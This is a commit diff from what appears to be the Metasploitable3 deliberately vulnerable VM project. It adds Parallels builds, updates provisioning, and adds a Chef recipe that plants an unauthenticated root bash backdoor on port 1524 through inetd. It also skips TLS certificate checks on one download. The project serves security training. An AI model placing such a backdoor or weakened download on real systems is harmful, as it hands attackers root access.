add ingreslock vuln

classic backdoor shell on 1524

.gitignore

@@ -2,6 +2,7 @@
 packer_cache/
 packer/builds/
 resources/drivers/
+resources/windows_pre_downloads/
 *.vfd
 *.exe
 *.msi

README.md

@@ -36,7 +36,7 @@ Requirements:
 * [Packer](https://www.packer.io/intro/getting-started/install.html)
 * [Vagrant](https://www.vagrantup.com/docs/installation/)
 * [Vagrant Reload Plugin](https://github.com/aidanns/vagrant-reload#installation)
-* [VirtualBox](https://www.virtualbox.org/wiki/Downloads), libvirt/qemu-kvm, or vmware (paid license required)
+* [VirtualBox](https://www.virtualbox.org/wiki/Downloads), libvirt/qemu-kvm, or vmware (paid license required), or parallels (paid license required)
 * Internet connection
 
 ### To build automatically:
@@ -52,38 +52,48 @@ Requirements:
 
 1. Clone this repo and navigate to the main directory.
 2. Build the base VM image by running `packer build --only=<provider> ./packer/templates/windows_2008_r2.json` where `<provider>` is your preferred virtualization platform. Currently `virtualbox-iso`, `qemu`, and `vmware-iso` providers are supported. This will take a while the first time you run it since it has to download the OS installation ISO.
-3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command `vagrant box add packer/builds/windows_2008_r2_*_0.1.0.box --name=metasploitable3-win2k8`.
+3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command `vagrant box add packer/builds/windows_2008_r2_*_0.1.0.box --name=rapid7/metasploitable3-win2k8`.
 4. Use `vagrant plugin install vagrant-reload` to install the reload vagrant provisioner if you haven't already.
 5. To start the VM, run the command `vagrant up win2k8`. This will start up the VM and run all of the installation and configuration scripts necessary to set everything up. This takes about 10 minutes.
-6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.
-
-Videos:
-
-Thanks to [Jeremy](https://twitter.com/webpwnized), you can also follow the steps in these videos to set up Metasploitable3:
-
-https://www.youtube.com/playlist?list=PLZOToVAK85MpnjpcVtNMwmCxMZRFaY6mT
+6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are:
+    - Username: `vagrant`
+    - Password: `vagrant`
 
 ### ub1404 Development and Modification
 
-Using Vagrant and a lightweight Ubuntu 14.04 vagrant cloud box image, you can quickly set up and customize ub1404 Metasploitable3 for development or customization.
-To do so, install Vagrant and a hypervisor such as VirtualBox. Then, visit the `bento/ubuntu-14.04` page and find a version that supports
-your hypervisor. For instance, version `v201808.24.0` is compatible with VirtualBox.
+Using Vagrant and a lightweight Ubuntu 14.04 vagrant cloud box image, you can
+quickly set up and customize ub1404 Metasploitable3 for development or
+customization. To do so, install Vagrant and a hypervisor such as VirtualBox,
+VMWare, or libvirt.
 
-Install the vagrant virtualbox vbguest plugin:
+Install the relevant provider plugin:
 
+    # virtualbox
     vagrant plugin install vagrant-vbguest
-    
-Then, navigate to the `/chef/dev/ub1404` directory in this repository. Examine the Vagrantfile there. Metasploitable ub1404 uses the vagrant `chef-solo` provisioner.
-To this Vagrantfile, add the metasploitable chef recipes that you desire -- you can browse them in the `/chef/cookbooks/metasploitable` folder. Or, 
-add or edit your own cookbook and/or recipes there.
 
-From the `/chef/dev/ub1404` directory, you can run `vagrant up` to get a development virtual ub1404 instance. After the initial `up` build and provision, 
-when you edit the chef runlist or when you edit a chef recipe, run `vagrant provision` from the same directory. For faster development, you can comment-out 
-recipes that you do not need to rerun -- but even if they are all enabled, vagrant provisioning should not take longer one or two minutes. 
-Chef aims to be idempotent, so you can rerun this command often.
+    # libvirt
+    vagrant plugin install vagrant-libvirt
 
-Consider taking a snapshot (e.g., `vagrant snapshot new fresh`) before modifying recipes, so that you can always return to an initial state (`vagrant restore fresh`).
-If you want a _totally_ fresh snapshot, you can do the initialization with `vagrant up --no-provision`, then take a snapshot, followed by `vagrant provision`.
+Then, navigate to the [chef/dev/ub1404](chef/dev/ub1404) directory in this repository.
+Examine the Vagrantfile there. Select a base box that supports your provider.
+
+Metasploitable ub1404 uses the vagrant `chef-solo` provisioner. Configure the
+chef_solo block in the Vagrantfile with the metasploitable chef recipes that you
+desire -- you can browse them in the [chef/cookbooks/metasploitable](chef/cookbooks/metasploitable)
+folder. Or, add or edit your own cookbook and/or recipes there.
+
+From the [chef/dev/ub1404](chef/dev/ub1404) directory, you can run `vagrant up`
+to get a development virtual ub1404 instance. After the initial `up` build and provision,
+when you edit the chef runlist or when you edit a chef recipe, run
+`vagrant rsync && vagrant provision` from the same directory. For faster
+development, you can comment-out recipes that you do not need to rerun -- but
+even if they are all enabled, vagrant re-provisioning should not take longer than
+one or two minutes. Chef aims to be idempotent, so you can rerun this command often.
+
+Consider taking a snapshot (e.g., `vagrant snapshot save fresh`) before modifying
+recipes, so that you can always return to an initial state (`vagrant restore fresh`).
+If you want a _totally_ fresh snapshot, you can do the initialization with
+`vagrant up --no-provision`, then take a snapshot, followed by `vagrant provision`.
 
 
 ## Vulnerabilities

build.ps1

@@ -1,7 +1,7 @@
 $ErrorActionPreference = "Stop"
 
-$virtualBoxMinVersion = "5.1.10"
-$packerMinVersion = "0.10.0"
+$virtualBoxMinVersion = "6.1.0"
+$packerMinVersion = "1.6.0"
 $vagrantMinVersion = "1.9.0"
 $vagrantreloadMinVersion = "0.0.1"
 $packer = "packer.exe"

build.sh

@@ -1,10 +1,11 @@
 #!/bin/bash
 
-min_vbox_ver="5.1.10"
+min_vbox_ver="6.1.0"
 min_vagrant_ver="1.9.0"
-min_packer_ver="0.10.0"
+min_packer_ver="1.6.0"
 min_vagrantreload_ver="0.0.1"
 min_vagrantvmware_ver="0.0.1"
+min_vagrantparallels_ver="0.0.1"
 min_vagrantlibvirt_ver="0.0.1"
 packer_bin="packer"
 packer_build_path="packer/builds"
@@ -125,6 +126,12 @@ if compare_versions $(vagrant plugin list | grep 'vagrant-vmware' | cut -d' ' -f
   providers="vmware $providers"
 fi
 
+if compare_versions $(vagrant plugin list | grep 'vagrant-parallels' | cut -d' ' -f2 | tr -d '(' | tr -d ')' | tr -d ',') $min_vagrantparallels_ver false; then
+  echo 'Compatible version of vagrant-parallels plugin was found.'
+  echo 'Parallels image will be built'
+  providers="parallels $providers"
+fi
+
 if compare_versions $(vagrant plugin list | grep 'vagrant-reload' | cut -d' ' -f2 | tr -d '(' | tr -d ')' | tr -d ',') $min_vagrantreload_ver false; then
     echo 'Compatible version of vagrant-reload plugin was found.'
 else
@@ -173,6 +180,9 @@ for provider in $providers; do
         echo "NOTE: If you are having issues, try starting over by doing 'vagrant destroy' and then 'vagrant up'."
     else
         if [ -z $box_import ]; then
+            if [ $provider = "qemu" ]; then
+              provider="libvirt"
+            fi
             if vagrant box add $packer_build_path/"$os_full"_"$provider"_"$box_version".box --name rapid7/metasploitable3-$os_short; then
             echo "Box successfully added to Vagrant."
             else

chef/cookbooks/metasploitable/recipes/apache_continuum.rb

@@ -4,6 +4,12 @@
 #
 # Copyright:: 2017, Rapid7, All Rights Reserved.
 
+include_recipe 'iptables::default'
+
+iptables_rule '01_apache_continuum' do
+  lines "-A INPUT -p tcp --dport 8080 -j ACCEPT"
+end
+
 package 'openjdk-6-jre'
 package 'openjdk-6-jdk'
 
@@ -44,4 +50,4 @@ end
 
 service 'continuum' do
   action [:enable, :start]
-end
+end

chef/cookbooks/metasploitable/recipes/ifnames.rb

@@ -0,0 +1,9 @@
+#
+# Cookbook:: metasploitable
+# Recipe:: ifnames
+#
+
+# block udev persistent net rules for consistent interface naming after cloning
+link '/etc/udev/rules.d/75-persistent-net-generator.rules' do
+  to '/dev/null'
+end

chef/cookbooks/metasploitable/recipes/ingreslock.rb

@@ -0,0 +1,27 @@
+#
+# Cookbook:: metasploitable
+# Recipe:: ingreslock
+#
+# Copyright:: 2020, Rapid7, All Rights Reserved.
+
+include_recipe 'iptables::default'
+
+iptables_rule '01_ingreslock' do
+  lines "-A INPUT -p tcp --dport 1524 -j ACCEPT"
+end
+
+package 'inetutils-inetd' do
+  action :install
+end
+
+# needs to happen before starting the service --
+# otherwise, if no services listed in inetd.conf,
+# inetd will refuse to start.
+execute 'add ingreslock to /etc/inetd.conf' do
+  command "echo 'ingreslock stream tcp nowait root /bin/bash bash -i' >> /etc/inetd.conf"
+  not_if "grep -q 'ingreslock stream tcp nowait root /bin/bash bash -i' /etc/inetd.conf"
+end
+
+service 'inetutils-inetd' do
+  action [:enable, :start]
+end

chef/cookbooks/metasploitable/recipes/iptables.rb

@@ -10,13 +10,22 @@ iptables_rule '00_established' do
   lines '-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT'
 end
 
+iptables_rule '00_lo_allow_in' do
+  lines '-I INPUT -i lo -j ACCEPT'
+end
+
+iptables_rule '00_lo_allow_out' do
+  lines '-I OUTPUT -o lo -j ACCEPT'
+end
+
 iptables_rule '01_ssh' do
   lines "-A INPUT -p tcp --dport 22 -j ACCEPT"
 end
 
+iptables_rule '01_icmp' do
+  lines "-A INPUT -p icmp -j ACCEPT"
+end
+
 iptables_rule '999_drop_all' do
   lines '-A INPUT -j DROP'
 end
-
-
-

chef/cookbooks/metasploitable/recipes/nodejs.rb

@@ -10,4 +10,6 @@ execute 'add nodejs 4 repository' do
   not_if { ::File.exist?('/usr/bin/node') }
 end
 
-package 'nodejs'
+package 'nodejs' do
+  options '--force-yes'
+end

chef/cookbooks/metasploitable/recipes/phpmyadmin.rb

@@ -10,7 +10,8 @@ include_recipe 'metasploitable::php_545'
 
 bash "download and extract phpmyadmin" do
   code <<-EOH
-    wget -c -t 3 -O /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz https://files.phpmyadmin.net/phpMyAdmin/3.5.8/phpMyAdmin-3.5.8-all-languages.tar.gz
+    wget -c -t 3 --no-check-certificate -O /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz https://files.phpmyadmin.net/phpMyAdmin/3.5.8/phpMyAdmin-3.5.8-all-languages.tar.gz
+    echo "a129d4f03901c047799f634b122734ab687b48975563c87adbf5dea679676e11  /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz" | shasum -a 256 --check --status
     tar xvfz /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz -C /var/www/html
     mv /var/www/html/phpMyAdmin-3.5.8-all-languages /var/www/html/phpmyadmin
   EOH

chef/dev/ub1404/Vagrantfile

@@ -1,19 +1,23 @@
 # This Vagrantfile can be used to quickly spin up a development instance of ub1404
 
 Vagrant.configure("2") do |config|
-  config.vm.define "dev" do |dev|
-    dev.vm.box = "bento/ubuntu-14.04"
-    dev.vm.box_version = "201808.24.0"
-    dev.ssh.username = 'vagrant'
-    dev.ssh.password = 'vagrant'
-    dev.vm.network "forwarded_port", guest: 21, host:2121
 
-    dev.vm.provider "virtualbox" do |v|
-      v.name = "Metasploitable3-ub1404-dev"
-      v.memory = 2048
-    end
+  config.vm.define "Metasploitable3-dev"
+  config.vm.box = "bento/ubuntu-14.04"
+  config.vm.box_version = "201808.24.0"
+
+  config.vm.provider :libvirt do |libvirt, override|
+    override.vm.box = "peru/ubuntu-14.04-server-amd64"
+    override.vm.box_version = "20190901.01"
+    libvirt.memory = 2048
   end
-  
+
+  config.ssh.username = 'vagrant'
+  config.ssh.password = 'vagrant'
+  config.vm.network "forwarded_port", guest: 21, host:2121
+
+  # manually rsync recipe changes before re-provisioning. e.g.,
+  # `vagrant rsync && vagrant provision`
   config.vm.provision "chef_solo" do |chef|
     chef.arguments = '--chef-license accept'
     chef.cookbooks_path = [ '../../cookbooks' ]
@@ -37,8 +41,12 @@ Vagrant.configure("2") do |config|
     chef.add_recipe "metasploitable::cups"
     chef.add_recipe "metasploitable::drupal"
     chef.add_recipe "metasploitable::knockd"
+    chef.add_recipe "metasploitable::ingreslock"
     chef.add_recipe "metasploitable::iptables"
     chef.add_recipe "metasploitable::flags"
     chef.add_recipe "metasploitable::clear_cache"
   end
-end
+
+  # Disable NFS sharing (==> default: Mounting NFS shared folders...)
+  config.vm.synced_folder ".", "/vagrant", type: "nfs", disabled: true
+end

packer/answer_files/2008_r2/Autounattend.xml

@@ -261,16 +261,6 @@
                     <CommandLine>cmd.exe /c mkdir -p C:\vagrant\scripts</CommandLine>
                     <Description>Create directory for vagrant files to avoid provisioner bug with packer.</Description>
                     <Order>26</Order>
-                </SynchronousCommand>
-                <SynchronousCommand wcm:action="add">
-                    <CommandLine>cmd.exe /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File a:\install_dotnet45.ps1 -AutoStart</CommandLine>
-                    <Order>97</Order>
-                    <Description>Install .NET 4.5.1</Description>
-                </SynchronousCommand>
-                <SynchronousCommand wcm:action="add">
-                    <CommandLine>cmd.exe /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File a:\install_wmf.ps1 -AutoStart</CommandLine>
-                    <Order>98</Order>
-                    <Description>Installing Windows Management Framework 5.0</Description>
                 </SynchronousCommand>
                  <!--WITHOUT WINDOWS UPDATES -->
                 <SynchronousCommand wcm:action="add">

packer/templates/aws/ubuntu_1404_ctf_2017.json

@@ -50,7 +50,6 @@
   ],
   "variables": {
     "iso_url": "http://old-releases.ubuntu.com/releases/14.04.1/ubuntu-14.04.1-server-amd64.iso",
-    "iso_checksum_type": "md5",
     "iso_checksum": "ca2531b8cd79ea5b778ede3a524779b9",
     "box_version": "0.1.18"
   }

packer/templates/pro/ubuntu_1404_pro.json

@@ -3,7 +3,6 @@
     {
       "type": "vmware-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "http_directory" : "{{template_dir}}/../../http",
@@ -25,7 +24,7 @@
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "echo 'packer' | sudo -S shutdown -P now",
       "guest_os_type": "Ubuntu_64",
       "tools_upload_flavor": "linux",
@@ -41,7 +40,6 @@
     {
       "type": "virtualbox-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "http_directory" : "{{template_dir}}/../../http",
@@ -63,7 +61,7 @@
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "echo 'packer' | sudo -S shutdown -P now",
       "guest_os_type": "Ubuntu_64",
       "disk_size": 40000,
@@ -104,7 +102,6 @@
   ],
   "variables": {
     "iso_url": "http://old-releases.ubuntu.com/releases/14.04.1/ubuntu-14.04.1-server-amd64.iso",
-    "iso_checksum_type": "md5",
     "iso_checksum": "ca2531b8cd79ea5b778ede3a524779b9",
     "box_version": "0.1.0"
   }

packer/templates/pro/windows_2008_r2_pro.json

@@ -3,14 +3,13 @@
     {
       "type": "vmware-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "boot_wait": "10m",
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "shutdown /s /t 10 /f /d p:4:1 /c \"Packer Shutdown\"",
       "guest_os_type": "winServer2008Standard-64",
       "tools_upload_flavor": "windows",
@@ -47,14 +46,13 @@
     {
       "type": "virtualbox-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "boot_wait": "10m",
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "shutdown /s /t 10 /f /d p:4:1 /c \"Packer Shutdown\"",
       "guest_os_type": "Windows2008_64",
       "disk_size": 61440,
@@ -137,8 +135,7 @@
     }
   ],
   "variables": {
-    "iso_url": "http://download.microsoft.com/download/7/5/E/75EC4E54-5B02-42D6-8879-D8D3A25FBEF7/7601.17514.101119-1850_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso",
-    "iso_checksum_type": "md5",
+    "iso_url": "https://download.microsoft.com/download/4/1/D/41DEA7E0-B30D-4012-A1E3-F24DC03BA1BB/7601.17514.101119-1850_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso",
     "iso_checksum": "4263be2cf3c59177c45085c0a7bc6ca5",
     "autounattend": "{{template_dir}}/../../answer_files/2008_r2/Autounattend.xml",
     "scripts_dir": "{{template_dir}}/../../../scripts",

packer/templates/ubuntu_1404.json

@@ -1,9 +1,40 @@
 {
   "builders": [
+    {
+      "type": "parallels-iso",
+      "iso_url": "{{user `iso_url`}}",
+      "iso_checksum": "{{user `iso_checksum`}}",
+      "http_directory" : "{{template_dir}}/../http",
+      "http_port_min" : 9001,
+      "http_port_max" : 9001,
+      "boot_command": [
+        "<esc><wait>",
+        "<esc><wait>",
+        "<enter><wait>",
+        "/install/vmlinuz",
+        " auto=true",
+        " priority=critical",
+        " initrd=/install/initrd.gz",
+        " preseed/url=http://{{ .HTTPIP }}:{{ .HTTPPort }}/preseed.cfg",
+        " -- ",
+        "<enter>"
+      ],
+      "boot_wait": "20s",
+      "communicator": "ssh",
+      "ssh_username": "vagrant",
+      "ssh_password": "vagrant",
+      "ssh_timeout": "2h",
+      "shutdown_command": "echo 'packer' | sudo -S shutdown -P now",
+      "guest_os_type": "ubuntu",
+      "disk_size": 40000,
+      "vm_name": "metasploitable3-ub1404",
+      "parallels_tools_flavor": "lin",
+      "cpus": 2,
+      "memory": 4096
+    },
     {
       "type": "vmware-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "http_directory" : "{{template_dir}}/../http",
@@ -25,7 +56,7 @@
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "echo 'packer' | sudo -S shutdown -P now",
       "guest_os_type": "ubuntu-64",
       "tools_upload_flavor": "linux",
@@ -41,7 +72,6 @@
     {
       "type": "virtualbox-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "http_directory" : "{{template_dir}}/../http",
@@ -63,7 +93,7 @@
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "echo 'packer' | sudo -S shutdown -P now",
       "guest_os_type": "Ubuntu_64",
       "disk_size": 40000,
@@ -86,7 +116,6 @@
     {
       "type": "qemu",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "http_directory" : "{{template_dir}}/../http",
@@ -109,7 +138,7 @@
       "accelerator": "kvm",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "echo 'packer' | sudo -S shutdown -P now",
       "disk_size": 40000,
       "vm_name": "metasploitable3-ub1404",
@@ -146,8 +175,10 @@
         "metasploitable::cups",
         "metasploitable::drupal",
         "metasploitable::knockd",
+        "metasploitable::ingreslock",
         "metasploitable::iptables",
-        "metasploitable::flags"
+        "metasploitable::flags",
+        "metasploitable::ifnames"
       ]
     }
   ],
@@ -160,7 +191,6 @@
   ],
   "variables": {
     "iso_url": "http://old-releases.ubuntu.com/releases/14.04.0/ubuntu-14.04-server-amd64.iso",
-    "iso_checksum_type": "sha256",
     "iso_checksum": "ababb88a492e08759fddcf4f05e5ccc58ec9d47fa37550d63931d0a5fa4f7388",
     "box_version": "0.1.12"
   }

packer/templates/vagrantfile-windows_2008_r2.template

@@ -47,7 +47,7 @@ Vagrant.configure("2") do |config|
         v.vmx["scsi0.virtualDev"] = "lsisas1068"
     end
 
-    win2k8.vm.provider "libvirt" do |v|
+    config.vm.provider :libvirt do |v|
       v.memory = "2048"
       v.cpus = "2"
       v.video_type = 'qxl'

packer/templates/windows_2008_r2.json

@@ -1,27 +1,59 @@
 {
   "builders": [
     {
-      "type": "vmware-iso",
+      "type": "parallels-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
-      "headless": false,
       "boot_wait": "10m",
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "shutdown /s /t 10 /f /d p:4:1 /c \"Packer Shutdown\"",
-      "guest_os_type": "windows7srv-64",
-      "tools_upload_flavor": "windows",
+      "guest_os_type": "win-2008",
+      "parallels_tools_flavor": "win",
+      "disk_size": 61440,
+      "floppy_files": [
+        "{{user `autounattend`}}",
+        "{{user `scripts_dir`}}/configs/microsoft-updates.bat",
+        "{{user `scripts_dir`}}/configs/win-updates.ps1",
+        "{{user `scripts_dir`}}/installs/openssh.ps1",
+        "{{user `resources_dir`}}/certs/oracle-cert.cer",
+        "{{user `resources_dir`}}/certs/gdig2.crt",
+        "{{user `resources_dir`}}/certs/comodorsadomainvalidationsecureserverca.crt",
+        "{{user `resources_dir`}}/certs/comodorsacertificationauthority.crt",
+        "{{user `resources_dir`}}/certs/addtrust_external_ca.cer",
+        "{{user `resources_dir`}}/certs/baltimore_ca.cer",
+        "{{user `resources_dir`}}/certs/digicert.cer",
+        "{{user `resources_dir`}}/certs/equifax.cer",
+        "{{user `resources_dir`}}/certs/globalsign.cer",
+        "{{user `resources_dir`}}/certs/gte_cybertrust.cer",
+        "{{user `resources_dir`}}/certs/microsoft_root_2011.cer",
+        "{{user `resources_dir`}}/certs/thawte_primary_root.cer",
+        "{{user `resources_dir`}}/certs/utn-userfirst.cer"
+      ],
+      "vm_name": "metasploitable3-win2k8",
+      "cpus": 2,
+      "memory": 4096
+    },
+    {
+      "type": "vmware-iso",
+      "iso_url": "{{user `iso_url`}}",
+      "iso_checksum": "{{user `iso_checksum`}}",
+      "headless": false,
+      "boot_wait": "10m",
+      "communicator": "ssh",
+      "ssh_username": "vagrant",
+      "ssh_password": "vagrant",
+      "ssh_timeout": "2h",
+      "shutdown_command": "shutdown /s /t 10 /f /d p:4:1 /c \"Packer Shutdown\"",
+      "guest_os_type": "windows7srv-64",
       "disk_size": 61440,
       "floppy_files": [
         "{{user `autounattend`}}",
         "{{user `scripts_dir`}}/configs/microsoft-updates.bat",
         "{{user `scripts_dir`}}/configs/win-updates.ps1",
         "{{user `scripts_dir`}}/installs/openssh.ps1",
-        "{{user `scripts_dir`}}/installs/install_dotnet45.ps1",
-        "{{user `scripts_dir`}}/installs/install_wmf.ps1",
         "{{user `resources_dir`}}/certs/oracle-cert.cer",
         "{{user `resources_dir`}}/certs/gdig2.crt",
         "{{user `resources_dir`}}/certs/comodorsadomainvalidationsecureserverca.crt",
@@ -47,14 +79,13 @@
     {
       "type": "virtualbox-iso",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "boot_wait": "10m",
       "communicator": "ssh",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "shutdown /s /t 10 /f /d p:4:1 /c \"Packer Shutdown\"",
       "guest_os_type": "Windows2008_64",
       "disk_size": 61440,
@@ -64,8 +95,6 @@
         "{{user `scripts_dir`}}/configs/microsoft-updates.bat",
         "{{user `scripts_dir`}}/configs/win-updates.ps1",
         "{{user `scripts_dir`}}/installs/openssh.ps1",
-        "{{user `scripts_dir`}}/installs/install_dotnet45.ps1",
-        "{{user `scripts_dir`}}/installs/install_wmf.ps1",
         "{{user `resources_dir`}}/certs/oracle-cert.cer",
         "{{user `resources_dir`}}/certs/gdig2.crt",
         "{{user `resources_dir`}}/certs/comodorsadomainvalidationsecureserverca.crt",
@@ -98,7 +127,6 @@
     {
       "type": "qemu",
       "iso_url": "{{user `iso_url`}}",
-      "iso_checksum_type": "{{user `iso_checksum_type`}}",
       "iso_checksum": "{{user `iso_checksum`}}",
       "headless": false,
       "boot_wait": "10m",
@@ -106,7 +134,7 @@
       "accelerator": "kvm",
       "ssh_username": "vagrant",
       "ssh_password": "vagrant",
-      "ssh_wait_timeout": "2h",
+      "ssh_timeout": "2h",
       "shutdown_command": "shutdown /s /t 10 /f /d p:4:1 /c \"Packer Shutdown\"",
       "disk_size": 61440,
       "format": "qcow2",
@@ -116,8 +144,6 @@
         "{{user `scripts_dir`}}/configs/microsoft-updates.bat",
         "{{user `scripts_dir`}}/configs/win-updates.ps1",
         "{{user `scripts_dir`}}/installs/openssh.ps1",
-        "{{user `scripts_dir`}}/installs/install_dotnet45.ps1",
-        "{{user `scripts_dir`}}/installs/install_wmf.ps1",
         "{{user `resources_dir`}}/certs/oracle-cert.cer",
         "{{user `resources_dir`}}/certs/gdig2.crt",
         "{{user `resources_dir`}}/certs/comodorsadomainvalidationsecureserverca.crt",
@@ -150,6 +176,16 @@
     }
   ],
   "provisioners": [
+    {
+        "type": "shell-local",
+        "only_on": ["linux", "darwin"],
+        "inline": ["cd {{user `resources_dir`}} && {{user `resources_dir`}}/download-windows-files.sh"]
+    },
+    {
+        "type": "shell-local",
+        "only_on": ["windows"],
+        "inline": ["cd {{user `resources_dir`}} && powershell {{user `resources_dir`}}/download-windows-files.ps1"]
+    },
     {
       "type": "file",
       "source": "{{user `scripts_dir`}}",
@@ -166,8 +202,6 @@
       "execute_command": "{{.Vars}} cmd /c C:/Windows/Temp/script.bat",
       "scripts": [
         "{{user `scripts_dir`}}/configs/update_root_certs.bat",
-        "{{user `scripts_dir`}}/configs/vagrant-ssh.bat",
-        "{{user `scripts_dir`}}/configs/disable-auto-logon.bat",
         "{{user `scripts_dir`}}/configs/enable-rdp.bat"
       ]
     },
@@ -184,8 +218,28 @@
     },
     {
       "type": "powershell",
-      "inline": [
-        "$env:chocolateyVersion = '0.10.8'; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))"
+      "scripts": [
+        "{{user `scripts_dir`}}/installs/install_dotnet45.ps1"
+      ]
+    },
+    {
+      "type": "windows-restart"
+    },
+    {
+      "type": "powershell",
+      "scripts": [
+        "{{user `scripts_dir`}}/installs/install_wmf.ps1"
+      ]
+    },
+    {
+      "type": "windows-restart",
+      "pause_before": "180s"
+    },
+    {
+      "type": "powershell",
+      "scripts": [
+        "./scripts/configs/vagrant-ssh.ps1",
+        "./scripts/installs/chocolatey.ps1"
       ],
       "pause_before": "60s"
     },
@@ -206,7 +260,9 @@
       "remote_path": "C:/Windows/Temp/script.bat",
       "execute_command": "{{.Vars}} cmd /c C:/Windows/Temp/script.bat",
       "scripts": [
-        "{{user `scripts_dir`}}/installs/install_boxstarter.bat",
+        "{{user `scripts_dir`}}/configs/disable-auto-logon.bat",
+        "{{user `scripts_dir`}}/chocolatey_installs/chocolatey-compatibility.bat",
+        "{{user `scripts_dir`}}/chocolatey_installs/boxstarter.bat",
         "{{user `scripts_dir`}}/chocolatey_installs/7zip.bat",
         "{{user `scripts_dir`}}/configs/apply_password_settings.bat",
         "{{user `scripts_dir`}}/configs/create_users.bat",
@@ -233,7 +289,7 @@
         "{{user `scripts_dir`}}/installs/install_wordpress.bat",
         "{{user `scripts_dir`}}/installs/install_openjdk6.bat",
         "{{user `scripts_dir`}}/installs/setup_jmx.bat",
-        "{{user `scripts_dir`}}/installs/install_ruby.bat",
+        "{{user `scripts_dir`}}/chocolatey_installs/ruby.bat",
         "{{user `scripts_dir`}}/installs/install_devkit.bat"
       ]
     },
@@ -308,8 +364,7 @@
     }
   ],
   "variables": {
-    "iso_url": "http://download.microsoft.com/download/7/5/E/75EC4E54-5B02-42D6-8879-D8D3A25FBEF7/7601.17514.101119-1850_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso",
-    "iso_checksum_type": "md5",
+    "iso_url": "https://download.microsoft.com/download/4/1/D/41DEA7E0-B30D-4012-A1E3-F24DC03BA1BB/7601.17514.101119-1850_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso",
     "iso_checksum": "4263be2cf3c59177c45085c0a7bc6ca5",
     "autounattend": "{{template_dir}}/../answer_files/2008_r2/Autounattend.xml",
     "scripts_dir": "{{template_dir}}/../../scripts",

resources/download-windows-files.ps1

@@ -0,0 +1,23 @@
+$Logfile = "C:\Windows\Temp\wmf-install.log"
+function LogWrite {
+   Param ([string]$logstring)
+   $now = Get-Date -format s
+   Add-Content $Logfile -value "$now $logstring"
+   Write-Host $logstring
+}
+
+LogWrite "Downloading dotNet 4.5.2"
+try {
+    (New-Object System.Net.WebClient).DownloadFile('https://download.microsoft.com/download/E/2/1/E21644B5-2DF2-47C2-91BD-63C560427900/NDP452-KB2901907-x86-x64-AllOS-ENU.exe', 'windows_pre_downloads/dotnet.exe')
+} catch {
+    LogWrite $_.Exception | Format-List -force
+    LogWrite "Failed to download file."
+}
+
+LogWrite "Downloading Windows Management Framework 5.1"
+try {
